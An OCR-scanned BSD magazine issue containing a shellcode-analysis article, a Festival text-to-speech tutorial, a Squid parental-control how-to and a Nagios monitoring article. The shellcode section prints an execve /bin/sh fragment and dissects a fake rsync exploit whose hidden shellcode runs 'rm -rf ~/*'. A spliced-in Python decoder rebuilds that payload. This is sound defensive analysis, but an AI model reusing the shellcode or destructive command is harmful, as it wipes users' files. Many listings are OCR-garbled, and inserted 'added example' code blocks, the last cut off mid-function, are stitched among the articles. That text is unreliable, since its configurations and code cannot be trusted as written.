    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";

Let's disassemble it with ndisasm; by now, we expect to see something familiar: see Listing 16.


...but control is better

It's always a good habit to examine a shellcode before executing it. For example, on the 28 May 2004, a prankster posted (http://www.seclists.org/lists/fulldisclosure/2004/May/1395.html) on full-disclosure (http://lists.netsys.com/mailman/listinfo/full-disclosure) what he asserted was a public exploit for a rsync (http://www.samba.org/rsync/) vulnerability. However, the code was weird: after a first, well-commented shellcode, there was a second, less visible shellcode: see Listing 17.

On top of that, after a brief look at the main() of the exploit, it was easy to spot that the latter shellcode was executed locally:

(long) funct = &shellcode2;
[...]
funct();


Therefore, if we want to know what the shellcode actually 
does, we can do nothing but disassemble it: see Listing 
18. 

As you can see, it's a self-modifying shellcode: 
instructions from 0x17 to 0x17 + 0x4B are decoded at run- 
time by XORing them with the value of al (which is initially 
0xFF and then decreases at each loop iteration). Once 
decoded, instructions are executed (jmp short 0x17). So 
let's try to understand which instructions will actually be 
executed. We can easily decode the shellcode using our 
beloved python (http://www.python.org/): see Listing 19. 
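As an added example (this is not the article's Listing 19), here is a decoder for the scheme just described; the blob it works on is constructed here rather than taken from the posted exploit, and the key direction (0xFF for the first encoded byte, then 0xFE, and so on) is an assumption.

```python
"""Decode the self-modifying shellcode scheme described above.

Added example, not the article's own code.  The blob below is constructed:
a 0x17-byte placeholder stands in for the decoder stub, and the 0x4B-byte
body is XOR-encoded the way the article describes (al starts at 0xFF and is
decremented once per iteration; assumed here to mean the first encoded byte
uses 0xFF, the next 0xFE, ...).  Only data is handled; nothing is executed.
"""
import re

BODY_OFFSET = 0x17   # first encoded byte (from the article)
BODY_LENGTH = 0x4B   # number of encoded bytes (from the article)
INITIAL_KEY = 0xFF   # initial value of al (from the article)


def xor_body(blob, offset=BODY_OFFSET, length=BODY_LENGTH, key=INITIAL_KEY):
    """XOR blob[offset:offset+length] with a key that starts at `key` and
    decreases by one per byte.  XOR is its own inverse, so the same call
    encodes a plain body and decodes an encoded one."""
    if offset + length > len(blob):
        raise ValueError("encoded region runs past the end of the shellcode")
    out = bytearray(blob)
    for i in range(length):
        out[offset + i] ^= (key - i) & 0xFF
    return bytes(out)


def printable_strings(data, min_len=4):
    """What hexdump (or strings) would show: runs of printable ASCII."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def analyse(blob):
    """Strings visible before and after decoding, plus the decoded bytes."""
    decoded = xor_body(blob)
    return {
        "before": printable_strings(blob),
        "after": printable_strings(decoded),
        "decoded": decoded,
    }


# Constructed sample.  The body carries the strings the article found in the
# decoded shellcode, padded with NULs to the 0x4B bytes the loop covers.
DECODER_STUB = b"\x90" * BODY_OFFSET           # placeholder, not real code
PLAIN_BODY = (b"/bin/sh\x00-c\x00rm -rf ~/* 2>/dev/null\x00"
              .ljust(BODY_LENGTH, b"\x00"))
ENCODED_SHELLCODE = xor_body(DECODER_STUB + PLAIN_BODY)

if __name__ == "__main__":
    report = analyse(ENCODED_SHELLCODE)
    print("strings before decoding:", report["before"])   # nothing readable
    print("strings after decoding: ", report["after"])
```

Every key in the loop has the high bit set, so no byte of the encoded body is printable ASCII; that is why hexdump shows nothing useful until the body is decoded.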

hexdump can already give us a first idea: see Listing 20. 

Mmmh... /bin/sh, sh -c rm -rf ~/* 2>/dev/null... This 
doesn't look good... But let's disassemble it to be sure 
(see Listing 21). 

The first instruction is a call, immediately followed by 
the strings displayed by hexdump. The beginning of the 
shellcode could be re-written this way: see Listing 22. 

Let's examine the called function, keeping only the 
opcodes starting at the instruction 0x2a (42): see Listing 
23. 

As you can see, it's an execve(2) syscall with the array 
sh, -c, rm -rf ~/* 2>/dev/null as the second argument. 
Needless to repeat that you should always analyse 
a shellcode before executing it! 


DANIELE MAZZOCCHIO 

Latest version: http://www.kernel-panic.it/security/shellcode/ 
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How To Convert 


Text to Voice Using Festival and Lame in FreeBSD 


In 2007 I built a web-based IM/Chat Service which was later 
launched as an iPhone web app. Making a long story short, 
I retired the service in 2008 and that was that. 


What you will learn... 
• To have basic knowledge on iPhone applications 


In the summer of 2010 I grew a bit bored of building search 
based apps so decided to brush the dust off of the old Bob 
Chatter code base. After tons of code rewriting and 
little sleep, Bob Chatter version 1.0.0 IM|Chat for WebOS 
devices was released. Release 1.0.1 of Bob Chatter 
includes a service which converts real-time chat instances 
into voice files. After realizing first hand there was little 
documentation regarding FreeBSD and voice technology, 
I decided to write a tutorial where others could learn from. 
This tutorial will demonstrate how to install the latest 
version of Festival in FreeBSD and convert text to voice 
files. By reading this tutorial you will also save yourself 
24 hours worth of headache, useless web searching 
and loads of curse words... After installing the current 
FreeBSD port festival-1.96_1 (2007) and, as stated above, 


[Figure 1 screenshot: a terminal in /usr/home/dango/vox listing the speech_tools, festival, festlex and festvox tarballs, with tar zxvf speech_tools-2.0.95-beta.tar.gz being run] 

Figure 1. Downloading source packages into the same directory 
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What you should know... 
¢ How to install the latest version of Festival in FreebBSD and co- 
nvert text to voice 


getting nowhere rather quickly, I decided to download the 
latest festival-2.0.95-beta (2010) from source. 

This tutorial has been tested on both FreeBSD 7.2-RELEASE 
and 8.0-RELEASE. 

Festival is a brilliant voice synthesizer developed at the 
University of Edinburgh Centre for Speech Technology 
Research. 


Required Festival Packages 

speech_tools-2.0.95-beta.tar.gz: Edinburgh Speech Tools Library 
festival-2.0.95-beta.tar.gz: Festival Speech Synthesis System source 
festlex_POSLEX.tar.gz, festlex_OALD.tar.gz, festlex_CMU.tar.gz: Lexicons based on various dictionaries 
festvox_kallpc16k.tar.gz: LPC diphone voice database files (Required) 
festvox_rablpc16k.tar.gz, festvox_cmu_us_rms_cg.tar.gz, festvox_cmu_us_slt_arctic_hts.tar.gz, festvox_cmu_us_awb_cg.tar.gz: Additional voice files (Optional) 


Before you begin installing Festival you will need to 
download the required packages. Note: All packages 
must be downloaded to the same directory; not doing 
so will render your installation unusable. In Figure 1, 
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t © eat 


secaiasl w=" If yeu wish te contribute 


File Edit View Terminal Go Help 


include irixaudio.ce 


: =- 
gcc -c -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 iP te BSD mafaZzZine, share 
Myton atte meee . -™» « 
gcc - -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 -I.. your knowledge and skilis 
i tee Mele ee ie ee: Pe 
macosxaudio.cc:227:7: warning: no newline at end of file with other BSD users —= 


gcc -c -fno-implicit-templates -03 -Wall -DSUPPORT FREEBSD16 - 
include Linux Ese ao net hesitate A read 


Linux sound.cc:68: warning: deprecated conversion from string con 


tant to ‘char*' : : 
Linux sound.cc:866: error: redefinition of ‘int freebsd16 support the guLt a e 1 ime Ss eon Cour 
rT 


Linux sound.cc:66: error: ‘int freebsd16 supported’ previously de webs TL t ce and emai 1 us 


ined here 


Linux sound.cc:867: error: redefinition of ‘int Linuxl6 supported La + t =: 1 
©:67: error: ‘int Linuxl6 supported’ previously defi your i ea -or an ar LC e. 


Linux sound.cc:6) 
ed here 
Linux sound.cc:68: warning: ‘aud sys_name’ defined but not used 
ene zi 

all packages are downloaded to the directory vox (/usr/home/ 
dango/vox). Once all files have been downloaded you can 
begin to decompress. 

Festival installation 
After downloading the required packages it is time to 
install. Note: Since the only feature of Festival needed 
for our system was text2wave, I did no testing 
of Festival's capabilities with sound cards. Note: You must 
compile speech_tools before any other source. 


tar zxvf speech_tools-2.0.95-beta.tar.gz 
cd speech_tools 
./configure 





Figure 2. Installation errors during compiling 


gmake 


During gmake, the errors depicted in the screenshot (Figure 2) will 
occur without making the changes addressed in Figure 3. 

Once speech_tools has successfully compiled, follow by 
compiling the festival source. 
[Figure 3 screenshot: speech_tools/audio/linux_sound.cc open in an editor, with the freebsd16_supported, linux16_supported and aud_sys_name definitions under #ifdef SUPPORT_FREEBSD16 (lines 66-68) and the corresponding lines under #ifdef SUPPORT_VOXWARE (lines 78-80) commented out] 
Figure 3. Commenting out unneeded lines 66-68 and 78-80 


tar zxvf festival-2.0.95-beta.tar.gz 
cd festival 
./configure 
gmake 

After successfully compiling the festival source, unpack the 
remaining required packages: 

tar zxvf festlex_CMU.tar.gz 
tar zxvf festlex_POSLEX.tar.gz 
tar zxvf festvox_kallpc16k.tar.gz 


The above will install necessary lexicon and voice files 
into (speech_tools) directory. 


References 

• http://www.cstr.ed.ac.uk/projects/festival/ – Official Festival site 
• http://festvox.org/festival – Festival 2.0.95 source download site 
• http://www.freebsd.org/ports/index.html – Lame 3.98.4 MP3 encoder 
• http://bobchatter.com – Bob Chatter Mobile IM|Chat 

Figure 5. Cool implementation of text to voice technology in Bob Chatter IM Mobile App 


For speech_tools to successfully compile I had to 
disable the following lines. In your speech_tools/audio/ 
linux_sound.cc file, comment out lines 66-68 and 78-80 
as shown in Figure 3. 





Testing your Installation 

After all the previous steps have been completed the killer stuff 
begins, testing your installation (Figure 4). Run your favorite 
editor and create hello.txt with whatever text and save. Run 
the following command: ./text2wave hello.txt -o hello.wav. 
On a successful install a hello.wav file will be created. Since 
.wav files are huge compared to .mp3 encoded files, I will 
install Lame from /usr/ports/audio/lame. Once make install 
clean is successful, run the following command: lame hello.wav 
hello.mp3 within your festival/bin directory. 

In the last screenshot of Figure 4 you will notice the 
size difference between the hello.wav and hello.mp3 file. 
Cheers to Lame! 

Having read this tutorial you will have a successful 
installation of the latest Festival on FreeBSD and a great 
starting point for implementing voice technology into some 
very cool applications or services. One such example is 
the Chat2Voice in the Bob Chatter mobile app (Figure 5). 
Chat2Voice converts real-time chat into voice files. 
DIEGO MONTALVO 

Diego Montalvo is a web/mobile application developer who 
has developed some interesting concepts. Diego currently 
resides in Brownsville, Texas but is finding his way back to sunny 
San Diego, California. The next tutorial will be written from the 
beach! Great day for a cold pint of Guinness! Enjoy the tutorial. 
Feel free to contact Diego at diego@earthoid.com 

Figure 4. Testing Festival installation, installing Lame and text to 
voice conversion 
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Carry the card that 
Supports BSD events 
around the world 






a 
4692 
VALID hth ae 
AN S C 
MEMBER SINCE ODIO 

BSD Fund is proud to sponsor of BSDCan 2010 and 
meetBSD California 2010 thanks to revenue from the 
BSD Fund Visa. A donation is made every time you 


use the card and simply charging your travel to an 
event can help sponsor that event. 








BSD Fund also raises money through direct donations 
on behalf of BSD projects such as the pcc compiler. 


Find our more at www.bsdfund.org 


BSD Fund Visa currently available in the USA + BSD Fund is a 501(c)(3) nonprofit organization 
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Squid proxy with Parental Controls How-To 


Traditionally, web pages were served via a webserver such 
as Apache and transmitted via the network on port 80 to 
a web-browser. 


What you will learn... 
• How to install a Squid proxy with parental controls 


While pages and content were cached in the 
browser cache, on larger networks it 
made sense to use a caching proxy such 
as Squid to reduce external traffic over the net for 
frequently fetched pages such as Google. This also 
improved the response of the local network, as traffic 
only had to reach the local cache to retrieve popular 
pages. Often, ISP's use other caches on the internet 
to shape the flow of traffic and certain countries use 
a combination of firewalls and proxies with exclusion 
lists to limit the content delivered to their citizens. This 
can also be used in reverse, and a competent user 
can use another proxy elsewhere on a non-standard 
port thereby bypassing the original content filter. It 
is therefore important to lock down the network and 
monitor for any strange activity when content filtering, 
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Figure 1. Squid setup Screen on Webmin 
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What you should know... 
- How to perform a clean FreeBSD install and configure networ- 
king 


unless deep packet inspection is used which is not 
always practical. 

There are a number of ways of configuring Squid to 
intercept port 80 traffic: as a stand-alone proxy, or as 
a transparent proxy. In the former scenario, for all traffic 
to pass through the proxy each client must be configured 
to use Squid, which on large networks with many 
clients can be time consuming if it is not centralised 
e.g. by using a proxy.pac file. This method also had the 
drawback that the user can disable the proxy settings, 
and if the network is not secure, any HTTP traffic will 
then leave unmonitored via the default gateway. A better 
solution would be to use Squid in transparent mode, and 
to redirect all port 80 traffic to the proxy. This also has 
disadvantages, in that the proxy will need to have dual 
network interfaces and the network router/firewall will 
have to be reconfigured to redirect all port 80 traffic to 
the Squid box. As this How-to was inspired by locking 
down my home network for my daughter, | have gone for 
the former method but there is no reason Squid could 
not be adapted to be a transparent proxy — all would be 





Squid executable                     /usr/local/sbin/squid 
Full path to PID file                /usr/local/squid/logs/squid.pid 
Full path to squid cache directory   /var/squid/cache 
Squid cachemgr.cgi executable        /usr/local/libexec/squid/cachemgr.cgi 
Full path to squid log directory     /var/squid/logs 

Figure 2. Squid module config screen on Webmin 
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required is to add firewall support to the FreeBSD kernel 
and IPFW/PF transparent support for Squid. Some 
additional tuning would be required to pass the traffic 
through DansGuardian and Privoxy after Squid, but the 
principle would remain the same. 

We will be using DansGuardian and Privoxy for content 
filtering. DansGuardian is free to use in a personal, 
government or educational environment, but a licence 
needs to be purchased for commercial use. If a totally 
free solution is preferred, SquidGuard could be used 
instead. Webmin is very useful as it will allow us to view 
cache statistics via a browser, and easily add restrictions to 
DansGuardian if desired. 

For this demo, | will be using FreeBSD 8.1 i386. 


Installing FreeBSD 
Proceed with a standard FreeBSD install and install the 
ports tree, configure networking using a static IP address, 
add a user account in the wheel group and install any 
utilities and patches that you favour, such as Midnight 
Commander (mc) and portaudit etc. 

In this install, the IP address of transproxy (transproxy.merville.intranet) 
is 192.168.0.139. 


Install the packages 
As root: 


pkg_add -r wget webmin squid privoxy 


Set up and follow the prompts from the script then start 
Webmin: 


/usr/local/lib/webmin/setup.sh 
/usr/local/etc/rc.d/webmin onestart 

Create the squid cache directories and start Squid: 

/usr/local/sbin/squid -z 
/usr/local/etc/rc.d/squid onestart 

Add the following to your hosts file: 

192.168.0.139 transproxy transproxy.merville.intranet 


Configuring Squid 
Login to webmin on port 10000 and browse to Servers/ 
Squid Proxy Server: see Figure 1. 

Amend the paths in Module Config to the following: see 
Figure 2. 

Open a browser, and use 192.168.0.139 port 3128 as 
the proxy. Add 192.168.0.139 to ignored hosts, and you 


[Figure 3 screenshot: Webmin "Ports and Networking" page, with "Proxy addresses and ports" set to "Listed below" and a single entry for port 3128 on address 127.0.0.1] 

Figure 3. Squid Ports and Networking screen on Webmin 


should be able to freely browse the internet, and the traffic 
visible in /var/squid/logs/access.log. If you access the 
Cache Manager Statistics (username/password squid) 
and drill down to the Cache Client Lists you will also see 
the hit ratio etc. 


Installing DansGuardian 


mkdir /usr/ports/distfiles 
cd /usr/ports/distfiles 
wget http://dansguardian.org/downloads/2/Stable/dansguardian-2.10.1.1.tar.gz 
cd /usr/ports/www/dansguardian 
make install clean BATCH=YES 


[Figure 4 diagram, "Browser HTTP Data flow using multiple filters": browser, DansGuardian, Privoxy (nuisance ads), Squid, web content] 

Figure 4. Data flow through the proxy 
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Proxy Configuration {gnored Hosts 


Direct internet connection 


*) Manual proxy configuration 


Use the same proxy for all protocols 


HTTP proxy: |192.168.0.139 





Secure HTTP proxy: | 





FTP proxy: 


| 


Socks host: | 





Automatic proxy configuration 


Figure 5. Client browser proxy settings 


lf you require extensive control over DansGuardian, 
download the DansGuardian Webmin module from 
sourceforge.net and install via the Webmin Modules 
link. You will have to modify the paths and directory 
permissions to reflect the FreeBSD install. 

Tune the configuration file 
/usr/local/etc/dansguardian/dansguardian.conf: 

filterip = 192.168.0.139 
filterport = 3129 
proxyip = 192.168.0.139 
proxyport = 8118 
daemonuser = 'nobody' 
daemongroup = 'nobody' 
loglocation = '/var/log/dg/dg.log' 
statlocation = '/var/log/dg/dg.stats' 
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Figure 6. Squid log 
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tod) 5 

.656 283b1446 Header: : X-XSS-Protection: 1; mode=block 

ojos eRe ls ese tae an: X-Cache: MISS from transproxy.merville.intranet 

.656 283b1440 Header: : Via: 1.6 transproxy.merville.intranet:3128 (squid/2.7.STABLE9) 
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.926 283b6T46 Header: s : GET veers sedetiies pboar.. fare eon) 


.928 283b8f40 Header: scan: Host: 
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Figure 7. Privoxy log 


accessdeniedaddress = 'http://transproxy/cgi-bin/dansguardian.pl' 


cd /var/log 

mkdir dg 

chown root:nobody dg 
chmod 770 dg 


/usr/local/etc/rc.d/dansguardian onestart 


Modify Squid so it only listens on port 127.0.0.1:3128 see 
Figure 3. 

Open the /usr/local/etc/privoxy/config file and change the 
listen address to match the following: 





listen-address 192.168.0.139:8118 

Figure 8. DansGuardian log 

Add a forward statement to push Privoxy's output 
through Squid: 

forward / 127.0.0.1:3128 

Comment out the debug lines so we can monitor the 
traffic: 

debug 1 
debug 1024 
debug 4096 
debug 8192 


Add the following lines to rc.conf so all services will start 
on boot: 


squid_enable="YES" 
privoxy_enable="YES" 
dansguardian_enable="YES" 
webmin_enable="YES" 


Change the proxy on your client from port 3128 to 3129. 
Ensure everything starts OK: 


/usr/local/etc/rc.d/squid onestop 
/usr/local/etc/rc.d/dansguardian onestart 
/usr/local/etc/rc.d/privoxy onestart 
/usr/local/etc/rc.d/squid onestart 
In three separate terminals, view the outgoing traffic: 
tail -f /var/log/dg/dg.log 


tail -f /var/squid/logs/access.log 
tail -f /var/log/privoxy/logfile 


You should now have a cached, content filtered proxy 
with advert removal. Reboot the box. 
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Figure 9. Privoxy GUI 
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Final testing and additional tweaks 
Checks: 


• Go to a site with lots of adverts. Most of these should 
  be removed with Privoxy. Ensure noscript/adblock is 
  turned off if you are running Firefox etc. 
• Go to a known bad site, e.g. playboy.com and ensure 
  the content is filtered. 
• Go to a known good site and ensure all content 
  downloads OK. 


The following improvements would be beneficial: 


1. Lock down Privoxy so only Squid can access it — this 
can be done via the config file or using a firewall rule 

2. Automate the retrieval of the latest blacklists and 
phrase-lists from dansguardian and blacklist.org 

3. Add further ACL's to Squid to prevent access after 
8:00 pm etc. on certain PC's 

4. Tune the exception lists / sensitivity of the proxies to 
your own taste. 

5. Handle HTTPS traffic better 
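To check that the chain built above (DansGuardian on 3129, Privoxy on 8118, Squid on 127.0.0.1:3128) is wired correctly and that improvement 1 has been applied, here is an added Python audit script that is not part of this How-To; the configuration fragments are constructed, the directive names are the real ones, and the permit-access value assumes DansGuardian reaches Privoxy from the host's own LAN address.

```python
"""Audit the DansGuardian -> Privoxy -> Squid chain from this How-To.

Added example, not part of the original article.  The configuration
fragments are constructed here; directive names are real (DansGuardian
filterip/filterport/proxyip/proxyport, Privoxy listen-address/forward/
permit-access, Squid http_port).  Assumption: DansGuardian connects to
Privoxy from the host's LAN address, so that is what permit-access allows.
"""
import re

DANSGUARDIAN_CONF = """
filterip = 192.168.0.139
filterport = 3129
proxyip = 192.168.0.139
proxyport = 8118
daemonuser = 'nobody'
"""

# Weak: Squid bound to every interface, Privoxy open to the whole LAN.
PRIVOXY_WEAK = """
listen-address 192.168.0.139:8118
forward / 127.0.0.1:3128
"""
SQUID_WEAK = "http_port 3128\n"

# Hardened: only the filter host can reach Privoxy, only loopback reaches Squid.
PRIVOXY_HARDENED = PRIVOXY_WEAK + "permit-access 192.168.0.139\n"
SQUID_HARDENED = "http_port 127.0.0.1:3128\n"


def parse_kv(text):
    """DansGuardian style: key = value, value optionally quoted."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"(\w+)\s*=\s*'?([^']*?)'?\s*$", line)
        if m:
            conf[m.group(1)] = m.group(2)
    return conf


def parse_directives(text):
    """Privoxy/Squid style: directive followed by whitespace-separated args."""
    out = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            parts = line.split()
            out.append((parts[0], parts[1:]))
    return out


def split_hostport(spec):
    """'127.0.0.1:3128' -> ('127.0.0.1', 3128); a bare port means every interface."""
    host, sep, port = spec.rpartition(":")
    return (host if sep else "0.0.0.0", int(port))


def reaches(target, bound):
    """True if a connection to `target` lands on a socket bound as `bound`."""
    return target[1] == bound[1] and bound[0] in ("0.0.0.0", target[0])


def audit_chain(dg_text, privoxy_text, squid_text):
    """Return a list of findings; an empty list means the chain is sound."""
    findings = []
    dg = parse_kv(dg_text)
    privoxy = parse_directives(privoxy_text)
    squid = parse_directives(squid_text)

    listens = [split_hostport(a[0]) for d, a in privoxy if d == "listen-address"]
    forwards = [split_hostport(a[1]) for d, a in privoxy
                if d == "forward" and a[0] == "/"]
    acls = [a for d, a in privoxy if d == "permit-access"]
    squid_ports = [split_hostport(a[0]) for d, a in squid if d == "http_port"]

    # 1. DansGuardian must hand filtered requests to Privoxy.
    upstream = (dg.get("proxyip", ""), int(dg.get("proxyport", "0")))
    if not any(reaches(upstream, listen) for listen in listens):
        findings.append("DansGuardian proxyip/proxyport does not match a Privoxy listen-address")
    # 2. Privoxy must push everything on to Squid.
    if not any(reaches(f, s) for f in forwards for s in squid_ports):
        findings.append("Privoxy has no 'forward /' entry that reaches a Squid http_port")
    # 3. Squid must not be reachable from the LAN, or clients can skip the filters.
    for host, port in squid_ports:
        if host != "127.0.0.1":
            findings.append("Squid http_port %d is bound to %s; bind it to 127.0.0.1" % (port, host))
    # 4. Privoxy on a LAN address needs an ACL (improvement 1 in the list above).
    if any(host != "127.0.0.1" for host, _ in listens) and not acls:
        findings.append("Privoxy listens on the LAN without permit-access; restrict it to the filter host")
    return findings


if __name__ == "__main__":
    for label, privoxy, squid in (("weak", PRIVOXY_WEAK, SQUID_WEAK),
                                  ("hardened", PRIVOXY_HARDENED, SQUID_HARDENED)):
        print(label, audit_chain(DANSGUARDIAN_CONF, privoxy, squid) or ["ok"])
```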


ROB SOMERVILLE 

Rob Somerville has been passionately involved with technology 
both as an amateur and professional since childhood. 
A passionate convert to *BSD, he stubbornly refuses to shave 
off his beard under any circumstances. Fortunately, his wife 
understands him (she was working as a System/36 operator 
when they first met). The technological passions of their 
daughter and numerous pets are still to be revealed. 
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with Nagios and OpenBSD 


Network monitoring 


So our OpenBSD-based network now includes redundant firewalls (http:// 
www.kernel-panic.it/openbsd/carp/index.html), domain name servers 
(http://www.kernel-panic.it/openbsd/dns/index.html), a mail gateway 
(http://www.kernel-panic.it/openbsd/mail/index.html) and a web proxy 
cache (http://www.kernel-panic.it/openbsd/proxy/index.html). 


What you will learn... 
• Installing Nagios 
• How to monitor a network with Nagios and OpenBSD 


One of Nagios' key features is its extensibility; new 
functionality can be easily added thanks to its 
plugin-based architecture, the external command 
interface and the Apache (http://httpd.apache.org/) 
web server. In this 
chapter, we will take a look at a few common issues that 
can be addressed with some of the most popular addons 
(http://www.nagiosexchange.org/) for Nagios. 


NRPE 

Suppose you want Nagios to monitor local services on 
remote hosts, such as disk space usage, system load or the 
number of users currently logged in. These are not network 
services, so they can't be directly checked out with standard 
plugins: what we would need is some kind of agent to install 
on remote systems and that Nagios could periodically 
query for the status of local services. Well, that's exactly 
what the Nagios Remote Plugin Executor (NRPE, http: 
//www.nagiosexchange.org/cgi-bin/page.cgi?g=Detailed/ 
1556.html;d=1) does: it allows you to execute local plugins 
on remote hosts! It is made up of two components: 


• an agent, running (either standalone or under inetd(8), 
  http://www.openbsd.org/cgi-bin/man.cgi?query=inetd&sektion=8) 
  on the monitored host, which waits for 
  incoming connections, executes the requested checks 
  and returns the status of the local services; 
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What you should know... 
- Agood knowledge of OpenBSD administration 
¢ Basic MySQL database administration 


° a plugin, check nrpe, used by Nagios to query the 
remote agents. 


Both the agent and the plugin are available from the 
following package: 


nrpe-x.x.tgz 


In addition, the Nagios plugins package will be installed 
on the monitored host as a dependency: this will allow 
the NRPE agent to take advantage of the standard 
Nagios plugins to perform local checks. The package 
installation automatically creates the nrpe user and 
group that the daemon will run as and copies a sample 
nrpe.cfg configuration file into /etc/: see Listing 16. To run 
NRPE as a standalone daemon, simply type: 


# /usr/local/sbin/nrpe -c /etc/nrpe.cfg -d 


and add the following lines to /etc/rc.local to start it 
automatically after reboot: 


/etc/rc.local 
if [ -x /usr/local/sbin/nrpe ]; then 
    echo -n ' nrpe' 
    /usr/local/sbin/nrpe -c /etc/nrpe.cfg -d 
fi 
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Listing 16. The package installation and copy asample configuration file 


/etc/nrpe.cfg 

# The syslog facility that should be used for logging 
purposes 

Tog traci lity—dacnon 

# Path to the pid file (ignored if running uder inetd) 

pid file=/var/run/nrpe.pid 

# Address £O bind ~o, to avoid binding on ail 
interfaces (ignored if running 

# under inetd) 

Seiver dddusss— ii hoe Un.) 

# Port to wait connections on (ignored if running under 
inetd) 

Servens cont 006 

# User and group the NRPE daemon should run as (ignored 
if running under inetd) 

Mepewiser— mires 

MEE  CrOUP = mkpe 

# Comma-delimited list of IP addresses or hostnames 
that are allowed to connect 

# to the NRPE daemon (ignored if running under inetd) 

el Vowedminests— iz) 02 Oe iyi 7 koe Gd 

# Don't allow clients to specify arguments to commands 
that are executed 

dont, blanc mrpe=0 

# Uncomment the following option to prefix all commands 
with a specific string 

#command prefix=/usr/bin/sudo 

# Don't log debugging messages to the syslog facility 

debug=0 

# Maximum length (in seconds) of executed plugins 

command timeout=60 


4 COnINana Gelinibilons are in the 1 1orm 


# 

# command [<command_name>]=<command_line> 

# 

# Thus, when the NRPE daemon receives a request to 

execute the command 

F) Command Name", it will ron phe “local* script 
Sspecimed Dy “command line”. 

# Note: macros are NOT allowed within command 
definitions 

command eheck) wees | —/tsn/ local libexee/magios/ cieck) 
USS Gs saa ome ae) 

Command eheeky loadi|—/ts1/ local) libexec/magies/ ciecks 
kewl UO Same oe. 0) 

command] Checkwdiskl|=/usi/ local] libexee/ magios/ check) 


disk =w 20 =c 10° =o /dev/wd0a 


command[check total procs]=/usr/local/libexec/nagios/ 


Cheek ou@eo an) 0 te 20 


Listing 17. Editing the configuration file 

/etc/nsca.cfg 

# Path to the pid file (ignored if running under inetd) 
pid_file=/var/run/nrpe.pid 

# Address to bind to (optional) 
server_address=[unreadable in scan] 

# Port to wait connections on 
server_port=5667 

# User and group the NSCA daemon should run as (ignored if running under inetd) 
nsca_user=_nagios 
nsca_group=_nagios 

# chroot(2) directory for the NSCA daemon 
nsca_chroot=/var/www/var/nagios/rw 

# Don't log debugging messages to the syslog facility 
debug=0 

# Path to the command file (relative to the chroot directory) 
command_file=nagios.cmd 

# File where to dump service check results if the command file does not exist 
alternate_dump_file=nsca.dump 

# Do not aggregate writes to the external command file 
aggregate_writes=0 

# Open the external command file in write mode 
append_to_file=0 

# Maximum packet age (in seconds) 
max_packet_age=30 

# Password to use to decrypt incoming packets 
password=password 

# Decryption method (16 = RIJNDAEL-256). It must match the encryption method 
# used by the client 
decryption_method=16 
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Alternatively, you can run NRPE under inetacs) (hAttp:// 
www.openbsd.org/cgi-bin/man.cgi?query=inetd&sektion 
=8) by adding the following line in /etc/inetd.cont (8) (Attp:// 
www.openbsd.org/cgi-bin/man.cgi?query=inetd.conf&se 
ktion=8): 


fecce/inétd.cont 


nrpe stream tcp wait _nrpe: nrpe /usr/ 


local/sbin/nrpe nrpe -c /etc/nrpe.cfg -i 

and by adding the nrpe Service IN /etc/services(5) (http:/ 
/www.openbsd.org/cgi-bin/man.cgi?query=services&se 
ktion=5): 


/etc/services 


nrpe 5666/tcp # Nagios Remote Plugin Executor 
and then send the inetas) (http:/www.openbsd.org/ 
cgi-bin/man.cgi?query=inetd&sektion=8) daemon the 


hangup signal, instructing it to re-read its configuration: 
# pkill -HUP inetd 


Now, on the Nagios server, you can perform checks 
using NRPE simply by defining commands such as 
the following (only make sure that the command name 
passed to the -c option has a corresponding command 
definition in the nrpe.cfg file on the remote host!): 

/var/www/etc/nagios/commands.cfg 
define command { 
    command_name    check-disk1-nrpe 
    command_line    $USER1$/check_nrpe -H $HOSTADDRESS$ -c check_disk1 
} 


NSCA 

Now suppose you want to monitor the correct execution 
of a process on a remote host, like a scheduled backup or 
a crontab job. This is still a local service, but, unlike disk 
space usage or system load, it would probably sound more 
logical to make it the responsibility of the job itself to notify 
Nagios of its exit status. That's the perfect job for the Nagios 
Service Check Acceptor (NSCA), which is a daemon 
program, meant to run on the Nagios server, designed to 
accept passive service check results from clients. 

NSCA is similar to NRPE in that it is made up of 
a daemon process and a client application, but now 
the roles are inverted: the daemon process runs on the 
Nagios server while remote hosts use the send_nsca utility 
to communicate their status to the daemon. NSCA then 
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forwards the check results to Nagios through the external 
command interface (so make sure you have enabled 
external commands in the main configuration file). 
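For the pattern described here, a job reporting its own exit status, an added example that is not from the article: a small Python wrapper that runs a job, maps its exit status to a Nagios return code and writes the tab-separated line (host name, service description, return code, output) that send_nsca reads from standard input. The sample jobs are Python one-liners constructed as stand-ins and the host and service names are hypothetical.

```python
"""Report a job's exit status to Nagios as a passive check via send_nsca.

Added example, not the article's code.  Intended use on the monitored host:
    python3 report_job.py | /usr/local/bin/send_nsca -H <nagios server> -c /etc/send_nsca.cfg
Host name and service description below are hypothetical; the jobs are
Python one-liners standing in for a real backup or cron job.
"""
import subprocess
import sys

OK, WARNING, CRITICAL, UNKNOWN = 0, 1, 2, 3
PYTHON = sys.executable  # interpreter used by the sample jobs


def nagios_state(exit_status):
    """Plugin convention: 0 OK, 1 WARNING, 2 CRITICAL, anything else UNKNOWN.
    A job killed by a signal (negative status from subprocess) is CRITICAL."""
    if exit_status < 0:
        return CRITICAL
    return exit_status if exit_status in (OK, WARNING, CRITICAL) else UNKNOWN


def clean_output(text, limit=256):
    """NSCA splits fields on tabs and results on newlines, so job output must
    not be allowed to inject either: keep the first line only, strip tabs."""
    first = text.splitlines()[0] if text.strip() else "(no output)"
    return first.replace("\t", " ")[:limit]


def format_result(host, service, state, output):
    """One passive service check result in send_nsca's input format:
    <host_name>\\t<service_description>\\t<return_code>\\t<plugin_output>\\n"""
    return "\t".join([host, service, str(state), clean_output(output)]) + "\n"


def run_and_report(host, service, argv, timeout=3600):
    """Run argv and return the send_nsca line describing how it went."""
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return format_result(host, service, CRITICAL, "job exceeded %ds" % timeout)
    except OSError as exc:
        return format_result(host, service, UNKNOWN, "could not start job: %s" % exc)
    state = nagios_state(proc.returncode)
    # On failure prefer stderr, which usually carries the reason.
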